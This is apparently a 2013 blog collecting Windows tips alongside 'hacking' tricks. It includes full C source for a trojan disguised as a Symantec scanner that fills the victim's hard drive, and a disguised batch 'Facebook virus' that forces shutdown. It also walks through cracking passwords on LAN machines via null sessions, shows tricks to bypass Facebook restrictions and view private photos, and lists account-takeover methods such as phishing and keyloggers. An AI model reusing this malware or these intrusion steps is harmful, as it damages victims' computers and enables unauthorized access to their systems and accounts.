Wednesday 6 November 2013

how to hide and unhide drive using cmd

Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt Step 2. In the Command Prompt, type Diskpart and hit enter key. If UAC (User Account Control), dialog- box prompts than click Yes. Step 3. Then type List Volume and press enter, this will produce the list of all drives. Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 1 (i.e. Volume Number) or by typing Select Volume C (i.e. Drive letter) Step 5. To hide a drive, type Remove Letter C . Here, C is the drive letter than you want to hide. You can use any drive letter you want. Step 6. That’s it. You are done! C drive is now hidden How to unhide hidden drive Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4 . Step 2. To show the hidden drive type Assign Letter C and hit enter, now you can view C: drive in explorer. That’s it. This is one way of hiding and un-hiding drives from explorer, for rest two stay tuned.

Friday 18 October 2013

how to remove delete confirmation dialogue block

Change the Recycle Bin settings Applies toWindows VistaYou can change the settings of theRecycle Bin to suit the way you work. For example, if you rarely empty the Recycle Bin because you want to avoid discarding files you might someday want to recover, you can increase the maximum storage size of the Recycle Bin. You can also turnoff the delete confirmation dialog box that appears every time you send files to the Recycle Bin, or even choose not to move files to the Recycle Bin and instead immediately remove them from your computer when you delete them. 1.On the desktop,right-clickRecycle Bin, and then clickProperties. 2.Click theGeneraltab, and then do any of the following:*. To set the maximum storage size of the RecycleBin, enter a number in theMaximumsizebox, which sets the Recycle Bin's maximum size (measured in megabytes) for the selected Recycle Bin underRecycle Bin Location.*. To turn off the delete confirmation dialog box, clear theDisplay deleteconfirmation dialogcheck box.*. To immediately remove files from your computer when you delete them, clickDo not move files to the Recycle Bin. If you do this, your fileswill always bepermanently removed when deleted.

how to hide rhe recycle bin

Show or hide the Recycle Bin Applies toWindows Vista The Recycle Bin usually appears on the desktop. Ifyou prefer, you can hide it. To show or hide the Recycle Bin on the desktop 1.Open Personalization by clicking theStartbutton, clickingControl Panel, clickingAppearance and Personalization, and then clickingPersonalization. 2.In the left pane, clickChange desktop icons, and then do one of the following:*. To remove the Recycle Bin from the desktop, cleartheRecycle Bincheck box.*. To display theRecycle Bin on the desktop, select theRecycle Bincheck box. 3.ClickOK.

Friday 16 August 2013

windows 7 secret

Windows 7 Cheatsheet::::::::::::::::::::::::::::::::: :: As you all know Windows 7 RC3 is launched. Here’s a little cheat sheet I made up for some of the handy new hot key combination, many of which I’ve become quite dependent on! From Desktop Windows Key + Tab : Aero [press Tab to cycle between Windows] Windows Key + E : Windows Explorer is launched. Windows Key + R : Run Command is launched. Windows Key + F : Search (which is there in previous Windows versions too) Windows Key + X : Mobility Center Windows Key + L : Lock Computer (It is there from the earlier versions as well) Windows Key + U : Launches Ease of Access Windows Key + P : Projector Windows Key + T : Cycle Super Taskbar Items Windows Key + S : OneNote Screen Clipping Tool [requires OneNote] Windows Key + M : Minimize All Windows Windows Key + D : Show/Hide Desktop Windows Key + Up : Maximize Current Window Windows Key + Down : Restore Down / Minimize Current Windows Windows Key + Left : Tile Current Window to the Left Windows Key + Right : Tile Current Windows to the Right [Continue pressing the Left and Right keys to rotate the window as well] Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc. Windows Key + = : Launches the Magnifier Windows Key + Plus : Zoom in Windows Key + Minus : Zooms out Windows Key + Space : Peek at the desktop From Windows Explorer 22. Alt + Up : Go up one level 23. Alt + Left/ Right : Back/ Forward 24. Alt + P : Show/hide Preview Panel Taskbar modifiers 25. Shift + Click on icon : Open a new instance 26. Middle click on icon : Open a new instance 27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges 28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu. 29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc. 30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group Though some of them are there in previous versions of Windows, Windows 7 has incorporated many of them and have started many afresh

Facebook virus

faceboof virus Making a fake facebook virus : ==================== 1) Open notepad 2) Type this in : @echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX! PAUSE shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........." 3) Save it as something.bat 4) Right click on shorcut and click Properties. 5) Click Change Icon 6) Choose Internet Explorer icon or similar , click OK , then click Apply. 7) Now your facebook virus is almost ready. 8) When victim click on it , he will get warning messages and after some time his computer automatically shutsdown .... :)) NOTE : ===== Its just a simple prank and it won't actually hack the victim

trojen from c language

Trojen from c language /* SPACE EATER TROJAN BY ASH- HACKER. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD! */ #include #include #include #include FILE *a,*t,*b; int r,status,vir_count; double i; char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice; void eatspace(void); void findroot(void); void showstatus(void); void draw(void); void accept(void); void main() { draw(); accept(); textcolor(WHITE); draw(); gotoxy(12,8); cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT..."); sleep(3); gotoxy(12,8); delline(); cputs("PRESS ANY KEY TO START THE SYSTEM SCAN..."); getch(); gotoxy(12,8); delline(); findroot(); } void accept() { textcolor(LIGHTRED); gotoxy(1,8); cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n \rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\". \n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT."); if((choice=getch())!=13) exit(0); } void draw() { clrscr(); textcolor(WHITE); gotoxy(12,2); cputs ("***************************** ***************************"); gotoxy(12,6); cputs ("***************************** ***************************"); gotoxy(12,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(67,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(14,4); cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)"); } void findroot() { t=fopen("C:\\windows\ \explorer.exe","rb"); if(t!=NULL) { fclose(t); textcolor(WHITE); a=fopen("C:\\windows\\system32\ \spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("C:\\windows\\system32\ \spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("D:\\windows\ \explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("D:\\windows\\system32\ \spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("D:\\windows\\system32\ \spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("E:\\windows\ \explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("E:\\windows\\system32\ \spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("E:\\windows\\system32\ \spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("F:\\windows\ \explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("F:\\windows\\system32\ \spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("F:\\windows\\system32\ \spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } if(t==NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM."); getch(); exit(1); } exit(1); } void eatspace() { textcolor(LIGHTRED); gotoxy(12,16); cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n"); textcolor(WHITE); gotoxy(12,18); while(1) { for(r=1;r<4;r++) { for(i=1;i<900000;i++) { status=fputs(ch,b); if(status==EOF) { textcolor(WHITE); vir_count=random(120); draw(); gotoxy(12,8); cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count); gotoxy(12,10); cprintf("PRESS ANY KEY TO CLOSE..."); getch(); break; } } cputs("."); if(status==EOF) break; } if(status==EOF) break; } exit(0); } void showstatus() { gotoxy(12,8); cputs("SCANNING THE SYSTEM FOR THREATS"); gotoxy(12,10); cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS"); gotoxy(12,13); cputs("SCAN IN PROGRESS. PLEASE WAIT..."); }

top 15 xp secret

1. Useful key shortcuts available: Windows key + D - shows the desktop. Windows key + M - minimizes all open windows. Windows key + Shift + M - maximizes all open windows. Windows key + E - Runs Windows Explorer. Windows key + R - shows the RUN dialog. Windows key + F - shows Search window. Windows key + Break - shows System Properties box. Windows key + TAB - Go through taskbar applications. Windows key + PAUSE Display the System Properties dialog box. Windows key + U Open Utility Manager. ALT + TAB - Cycle through opened applications. Hold down CTRL while dragging an item to Copy it. CTRL + ESC Display the Start menu. ALT + ENTER View the properties for the selected item. F4 key Display the Address bar list in My Computer or NUM LOCK + Asterisk (*) Display all of the subfolders that are under the selected folder. 2. Lock Windows to protect computer : You can lock Windows to protect the computer when leaving the station easily by creating a shortcut with the path rundll32.exeuser32.dll, LockWorkStation. The Windows key + L is also a shortcut to this feature. 3. Edit sysoc.inf to list all software : To show all software that can be removed from your computer (including protected Windows services), you can manually edit (using notepad for example) the sysoc.inf file located in Windows \inf\. Just remove the word hide next to the software pack. Note - use this at your own risk. Removing critical components of the system will make Windows instable. 4. Windows XP comes with IPv4 and IPv6 : Windows XP comes both IPv4 and IPv6 support. To enable IPv6, you can install the protocols needed with the command "ipv6 install" in the command-prompt. Then type ipv6 /? to see the options. The installation will not remove the IPv4 protocols so your current configuration will still work. 5. Access Task Manager with shortcut : To access the Task Manager easier, you can make a shortcut that points to %windir% \system32\taskmgr.exe. 6. Stop treating ZIP files like Folders : If you don't want your Windows XP to treat ZIP files like folders, you can disable this component by running regsvr32 /u zipfldr.dll at the command prompt or Run dialog. If you start missing it, you can enable it by typing regsvr32 zipfldr.dll. 7. Run program as diffrent user : You can run a program as a different user. Right click an application and select Run As command. 8. Switch users leaving applications opened : You can switch users leaving the applications opened too (*NOTE* use this only when needed since it could lead to system instability). Go to Task Manager - processes and end the process explorer.exe. This will end only your session and not all applications. Then go to Applications tab, click New task and type runas /user:domainname \username explorer.exe. A password prompt will appear to login to the desired username. The user's session will start, with all your previously applications running. I recommend to open first a command-line prompt and type runas /? to see all the options available. 9. Rename multiple files in Windows at once : Rename multiple files in Windows at once. Select them all, right click and select Rename. Enter the desired name. They will be renamed using what you specified, with a number in brackets to distinguish them. 10.Task kill feature in Windows : Windows has a task kill feature similar to Linux. Go to a command prompt and run the command tasklist to see running processes with PID numbers. Then type tskill to end the specific task. This forces an instant closing of the task. 11. Edit features with GPEDIT.MSC : You can edit many features by running gpedit.msc. You can add log on/log off scripts here and many features. 12. Edit accounts in the command prompt : You can edit accounts by running "control userpasswords2" at the command prompt. 13. Use systeminfo.exe to see System Information : You can use the systeminfo.exe command in the command prompt to see System Information, including all Windows updates and hotfixes. 14. Disable system services for maximum performance : There are system services that you can disable to free up the system's load. To access the interface that permits you to make changes to system's services, type services.msc and the command prompt. This is a list of services that are *usually* useless and can be safely disabled. Alerter Application Layer Gateway Service, Application Management Automatic Updates Background Intelligent Transfer Clipbook Distributed Link Tracking Client Distributed Transaction Coordinater Error Reporting Service Fast User Switching Compatibility IMAPI CD-Burning Indexing Service IPSEC Services Messenger Net Logon Net Meeting Remote Desktop Sharing Network DDE Network DDE DSDM Portable Media Serial Number Remote Desktop Help Session Manager Remote Registry Secondary Logon Smartcard SSDP Discovery Service Uninterruptible Power Supply Universal Plug and Play Device Host Upload Manager Webclient Wireless Zero Configuration WMI Performance Adaptor NOTE: Make sure you don't need them since some applications you're using could depend on them. If you make any application to fail by disabling any of the services, go back and enable it again. 15. Repair Windows XP by using the XP installation CD: If your system failes to start due to an error related to missing HAL.DLL, invalid Boot.ini or any other critical system boot files you can repair this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then run "attrib -H -R -S" on the C:\Boot.ini file and delete it. Run "Bootcfg / Rebuild" and then Fixboot.

Thursday 15 August 2013

simple command for lan hacking

Simple Commands for LAN Hacking for beginner I am sure many guys know all these commands.I am just gonna start on LAN Hacking so I am starting from basics.These commands are for beginners.These commands will run on CMD prompt. First of all, open your Network Connection. Now right click and select Properties. Then Select TCP/IP and click on Properties again. Click on Advanced and WINS tab. Here select Default for NeBIOS. Now come back to the main window named Local Area Connection. Now select File and Print Sharing for Microsoft Networks and hit enter. NOTE : This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD. First thing you need to know is some very helpfull commands to use on CMD(Command Prompt). In case you don’t know how to get CMD open in your box, then click on Start, then Run, then type “cmd”. nslookup net view net use net user ping tracert arp route nbtstat netstat ipconfig In case you don’t know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does. This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the “ping” command. CODE : ping x.x.x.x (x is the IP address). ping www.whatever.com (www.whatever.com is the website you want to ping, but you don’t know the IP) NOTE : Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down. This command is mostly for resolving DNS into IP. Lets say you know the website URL but you don’t know its IP(and you want to find out). nslookup www.whatever.com (www.whatever.com is the website you want to find out the IP) Now, another really nice function of nslookup is to find out IP of specific Mail Severs. CODE : nslookup (enter) set type=mx (enter) yahoo.com This command will give you the mail server IP of yahoo.com . You can use whatever server you want and if it is listed on DNS, then you get the IP. Now why would you want to have an IP of a mail server? To send spoofed mail to your friends or even for SE. In case you looking for “How to spoof email”, then look for my “How to spoof email tutorial” http:// www.infowar.com/ forums/ showthread.p … p;threadid=2360 This command will give you the hops that a packet will travel to reach its final destination. OBS: This command is good to know the route a packet takes before it goes to the target box. CODE : tracert x.x.x.x (x is the IP address) tracert www.whatever.com (www.whatever.com is the website you don’t know the IP) This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN. CODE : arp -a Route This command will show you the routing table, gateway, interface and metric. CODE : route print This command will show tons of very helpful things.Your IP, gateway, dns in use. CODE : ipconfig ipconfig /all This command will give all that info but for all networks you might have it.Also, in case you have a dynamic IP and want to change it, then type. ipconfig /release (this will release your IP) ipconfig /renew (this will renew your iP) NOTE : Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don’t do anything stupid. This command will show you connection to your box. CODE : netstat netstat -a (this will show you all the listening ports and connection with DNS names) netstat -n (this will show you all the open connection with IP addresses) netstat -an (this will combined both of the above) This command will show you the netbios name of the target box. CODE : nbtstat -A x.x.x.x (x is the IP address) nbtstat -a computername net view x.x.x.x or computername (will list the available sharing folders on the target box) net use \ipaddressipc$ “” / user:administrator (this command will allow you to connect to the target box as administrator) Now if you want to connect to the target box and browse the entire C drive, then use this command: net use K: \computernameC $ (this will create a virtual drive on your “my computer” folder) NOTE : Keep in mind that this will only works if the target box doesn’t have an administrator password set. And least but not last, the “help” command. whatevercommand / help whatevercommand / ? This command will help you to understand what it does and all the switchs available for each command. Very useful if you know the command, but forgot the right switch.

change your ip address

Change your IP in less than 30 seconds The following is a guide on how to change your IP in 30 seconds or less. This can be used if your IP has been banned from a game server, or on gunbound if your IP get's blocked. I've tried this on both Windows XP and Windows 2000, and it has worked : Click on "Start" in the bottom left hand corner of screen. Click on "Run" Type in "command" and hit ok. You should now be at an MSDOS prompt screen. Type "ipconfig / release" just like that, and hit "enter" Type "exit" and leave the prompt Right-click on "Network Places" or "My Network Places" on your desktop. Click on "properties" NOTE : You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks. Right click on "Local Area Connection" and click "properties" Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab Click on "Use the following IP address" under the "General" tab Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up). Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers. Hit the "Ok" button here Hit the "Ok" button again NOTE : You should now be back to the "Local Area Connection" screen. Right-click back on "Local Area Connection" and go to properties again. Go back to the "TCP/IP" settings This time, select "Obtain an IP address automatically" Hit "Ok" Hit "Ok" again You now have a new IP address NOTE : This only changes your dynamic IP address, not your ISP/ IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.

hack blocked friend request

So Facebook has a new trick up their sleeve which is annoying the heck out of many many people. In fact, I myself tried to send a request to someone who lives less that 15 minutes away and it wouldn't let me. So if you've gotten the Facebook "Do you know this person?", "Friend Request Can't Be Sent" message while trying to send a Facebook friend request, here's the GeekDrop trick on how to outslick Facebook and send that request anyway. It's actually very simple. Here's what you'll be needing: * Firefox (FF) * The FF extension named "Tamper Data". (Install it, and then restart FF). Once the Tamper Data extension is installed, you'll find it's menu item under the "Tools" menu in FF. Click it when mentioned below to open it's window. So let's start, simply follow the steps in the screenshots below ... Facebook friend request hack blocked Here's the screen you'll see when Facebook blocks you from trying to add a friend. The title of the dialog box says "This Request Can't Be sent", and "Do you know this user personally?". We want to go around this ... Facebook trick to bypass a blocked friend request Facebook has gotten a little smart and when you click the "Add as friend" button on the target's profile, you may see the top screen again. * You'll need to get to the "Send request" screen as shown above. The trick here is to just keep clicking the "Add Friend" button, and closing the "Do you know this user personally" dialog box over and over until the "Send Request" screen shown above finally pops up. It may be the second time, it may be the 50th time, but it'll eventually pop up. * When it does, go to the "Tools" menu in Firefox and click the "Tamper Data" menu item near or at the bottom of the list. * Then as shown in the screen below, click the "Start Tamper" menu item. * And then finally, click the "Send Request" button in the screenshot above. Facebook Tamper Data Edit Screen Facebook Friend Request screen Add Facebook tamper request screen click tamper Once you've clicked the Send Request button with Tamper Data started, the above screen will show, make sure that the URL shown looks like the above one, so you're "adjusting" the correct data. Then Click the "Tamper" button. Facebook Tamper Popup Submit You'll come to the above screen next. Follow the instructions as shown and click the OK button. If or when any other "Tamper with request" screens popup while you're in the middle of editing the above data, just click the "Abort request" button on it to get it out of your way. Facebook Javascript Content Length Tamper Friend Request Hack Trick Once you click the OK button on the edit screen you'll see the above popup dialog, just click the OK button. This needs to be done to keep all data proper before it's sent. Facebook Add as friend do you know this person blocked request successfully added Once you OK the Content Length dialog, you should see the above screen, as if you were never blocked from sending the facebook friend request. If you get the original "this request can't be sent" screen again, just do all of the steps over again. You may have to do it a few times until it works. Eventually it will. And that's all there is to it! We have many other awesome loopholes and tricks up our sleeves here on GeekDrop, and all of the best stuff is in our private Premie area, consider subscribing for access to the full GeekDrop works, it's very very cheap! And be sure to click the Facebook Like and Retweet buttons at the top of this post so all of your friends know where to get the good stuff! Smile

hack pc on lan

Hack your desired PC on LAN As I have told in my previous post Simple Commands for LAN Hacking for Beginners that these days I am working on LAN Hacking so guys here is my new post in this respect .Hope you guys love it .Dont forget to Change your IP Address if you want to remain safe but its not compulsary.Through this technique you will be able to hack your desired PC on LAN . This technique will be taking advantage of Port 139.Most of the time,Port 139 will be opened.But if unfortunately your victim's Port 139 is filtered or closed then you can't hack him by this method .So guys follow these steps carefully and at the end you will be able to hack Lan computers. NOTE : All the tools used in this tutorial have already been sent to all the Email subscribers to their emails,but if someone didn't got it then post your email in the comments and if we find that email in subscription list we will send you all the tools. Steps to Follow * First of all,I will do a port scanning at the target computer which is 192.168.40.128.This computer is inside my LAN network. * Scan it using Nmap, this is actually for checking either its port is opened or closed. * I get the result and it shows Port 139 is opened up for me. * Now we will need both of these tools: 1. USER2SID & SID2USER 2. NetBios Auditing Tool * I have already sent these tools to all the Email Subscribers. * After you get both of them,put them in the C: directory. * Now you need to create a null session to the target computer.For this open cmd prompt and write this below command as it is as shown in image below : * Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER. * We will first using USER2SID to get the ID.Just follow all the codes same as shown in below image ,just replace the IP Address of victim * We will test against the Guest account because Guest account is a built in account. * After we get the ID,we need to do some modification on the ID. * We take the ID we get from the guest account and modified it become "5 21 861567501 1383384898 839522115 500". * Please leave out the S-1-,leave out all the - too. * Now you will see that you get the username of the Administrator account. * In this case,the Administrator account is Administrator. MAIN PART * Now we are going to crack the Administrator account for the password in order to access to the target computer. * First of all,extract the NetBios Auditing Tool in C directory, which you have received in your email. * Now open cmd prompt and write the below code as it is : * Press on enter and the tool will run and finally you will crack the password. * In this case,I have get the password. * In order to proof that I can get access to the target computer using this password. * After you press enter,it will prompt you for the username and password. * Therefore,just input them inside the prompt and continue. * Target C drive will be on your screen.You are done .... Prevention * In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 13.

hello tune hack

hi Guys... im 1st tym posting mah Trick Which im using from Last 2 months... THIS TRICK HELPFUL FOR THOSE WHO MAINTAIN LOW BALANCE ON PHONE (LESS THAN 10/-) WITH THE HELP OF THIS TRICK U CAN USE HELLO TUNE FOR 10 DAYS @RS 5 ONLY... Now trick is here... . Keep balance app. To zero.. keep balance rs 1 or less than 2... Now call 578785 (toll free) and acticate ur Favorite Hello Tune... after activating.. Ur balance goes to minus 5 (-5).. Dats it... UR HELLO TUNE WILL BE ACTIVATE FOR 10 DAYS... (15 + 10 for just 5 rs.) NOW RECHARGE.. Airtel wont charge u anything later... .. . now when ur 10 days are going to over Reduce ur Balance to 1 or less Than 2.. Keep ur balance low untill Ur Hello Tune subrcription renew.. After 10 days airtel again do ur balance to -5 and renew ur hello tune for 10 days... Thats the 100% legal trick.. Working 100% in delhi... Im using it for last 2 months... Enjoy... And reply if its working in ur state or not.??

free airtel to airtel

Free Airtel to Airtel Free Airtel to Airtel Hi friends,this is an special offer for airtel customers to call free from airtel to airtel free of cost for 100 minutes any time in a day.this is an service provided by an website called beep.download a small application to your mobile phone and activate it and now you can use the free calls.to download click the link below http://wap.beepindia.com/ beep.php

free sms airtel

Free SMS AIRTEL NEW AIRTEL FREE SMS TRICKS 2011 You can now send 2 free sms daily. Here is how you do it: » Write : %F% (mobile no) (msg) and send it 59191 » Example: %F% +919995****** Hello and send it to 59191

turn off your lan computer by using main pc

Turn Off- Ur Lan Computer..By Using Main PC Guys here is a amazing trick which you can use in your school, college office or at any place where you are a part of any LAN to shutdown all computers. Just follow some steps and you are done with this cool trick. 1. First of all you need admin access to a computer connected on any LAN. 2. Now open commant prompt. (start/run/cmd) 3. Now type “shutdown – i” (without quotes). 4. A dilogue box will open. 5. You can add the computer/ computers you want to make target. 6. Now you have to choose the action(shutdown/restart/log out). 7. Set a time limit. 8. Click ok and other work will be done automatically. Enjoy … !!

find who unfriend you on Facebook

Find who Unfreinded you on Facebook Lots of people are curious to find who unfreind them or removed them on Facebook, If this is the case with you too then we have the solution for your curosity, Unfriend Finder for Facebook is a Google chorme extension which will let you know who Unfreinded you on Facebook , The Extension is very simple to use, Below I am posting a step by step guide to install and use Unfreind Finder 1.First of all Install Unfriend Finder for Facebook Google Chrome extension 2.Once it is installed you will get an “Unfriends” option just below “Friends” option. Installation Follow these Steps to Uninstall previous versions of Unfriend Finder. From the Tool menu, you need to reach the Extension pages (or navigate to chrome://extensions/) 1)Confirm installation 2)Despite the alert about data collection, confirm. Chrome shows this alert for every userscripts. Unfriend Finder is only collecting data about your friendlist, only on facebook.com. 3)Installation review 4) That's it. You are done with the installation. And now you will recieve the notification whenever you are unfriended.

send free sms from Facebook

You can send free sms from facebook by using an application its called the INDYAROCKS . I tested it and we can create the account by using facebook and few more things within 2 minutes. Start sending sms from the facebook application itself :) , you can send sms all over to india from the facebook itself :) you can send free sms to your friends * group sms * schedule your sms and more features :) * i heard that 160by2 and way2sms have limited sms sending facility, but indyarocks don’t have that limit we can send unlimited :) , By just login to your facebook account and open indyarocks application on facebook and start sending sms to your friends all over india Email This BlogThis! Share to Twitter Share to Facebook Share to Google Buzz

top 10 ways to hack Facebook

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, I have written a couple of post related to facebook hacking here at RHA, In my previous post which I wrote in 2010 related to facebook hacking and security 4 ways on How to hack facebook password, I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2011, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2010. So here are the top 10 methods which have been the most popular in 2011: Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims " Email Address " and " Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials. I have explained the step by step phishing process in my post below: How To Hack Facebook Password 2. Keylogging Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. I have dedicated a half of my newsest book "An introduction to keyloggers, RATS And Malware " to this topic. 3. Stealers Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful. If you want to how stealers work and how you can set up your own one?, Kindly refer the book above. 4. Session Hijacking Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking. Further Information Gmail Cookie Stealing And Session Hijacking Part Gmail Cookie Stealing And Session Hijacking Part 2 Gmail Cookie Stealing And Session Hijacking Part Facebook Session Hijacking Attack (Recommended) 5. Sidejacking With Firesheep Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users. To know more about sidejacking attack and firesheep, read the post mentioned below: Firesheep Makes Facebook Hacking Easy 6. Mobile Phone Hacking Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying softwares are: 1. Mobile Spy 2. Spy Phone Gold 7. DNS Spoofing If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account. 8. USB Hacking If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below: Usb password stealer To Hack Facebook Passwords 9. Man In the Middle Attacks If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below: Man In the Middle Attacks With SSL Strip If you are really interested in learning how man in the middle attacks, you can view the presentation below by oxid.it. 10. Botnets Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.

how to increase internet speed

The following post is on will tell you some methods to increase your internet speed,I will show you some ways to increase your net and browser speed Go to Start>>Run and then type in “gpedit.msc” without the quotes (“) Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler. after that, you should see something like “Limit Reservable Bandwidth”. Modify that and set it to “Disabled ”, or you can put it to “Enabled” and change the value to 0. Now this will increase your internet speed by 20%

how to view private profile on Facebook

how to view private facebook profiles Learn how to view private facebook profiles In post i will tell you how to view private facebook profiles,This latest hack proves that anyone in the world is able to view anyone’s private tagged pictures,This is why facebook is not privite is still open even after such publicity all over the web.Major security threat. Have you ever wanted to see pictures of an enemy but you couldn’t because her or his facebook account was set to private. Well thats all going to change because I will show you very simple way to view private facebook profiles Method: 1. Login in your Facebook Account www.facebook.com 2. Search for the person 3. Find the persons ID # by Clicking on Send messages 5. Copy and Replace the ID # to the link http://www.facebook.com/ photo.php?pid=1234567&id= [Person’s ID]&op=1&view=all&subj= [Person’s ID] 6. Copy and paste the link in your browser 7. You should be able to see 10-20 pictures before facebook denies you access.

How to get into facebook at school - Method

1. Go to Unblock facebook now Now site. 2. Now, simply enter www.facebook.com in text field below “Website URL” and hit “Browse” to unblock Facebook site. 3.Thus, now your blocked Facebook is converted to unblocked Facebook and you can now get into facebook at school or office using this hack Thats it. Just check out this Facebook proxy site server useful to unblock Facebook site. Thus, you can now bypass Facebook restrictions imposed by sytem admins and unblock Facebook site. This proxy site can not only unblock Facebook , but also unblock myspace , orkut and many other blocked sites. If you have any problem in using this Facebook proxy site to unblock Facebook,

Wednesday 14 August 2013

transfer your Facebook friends to Google +

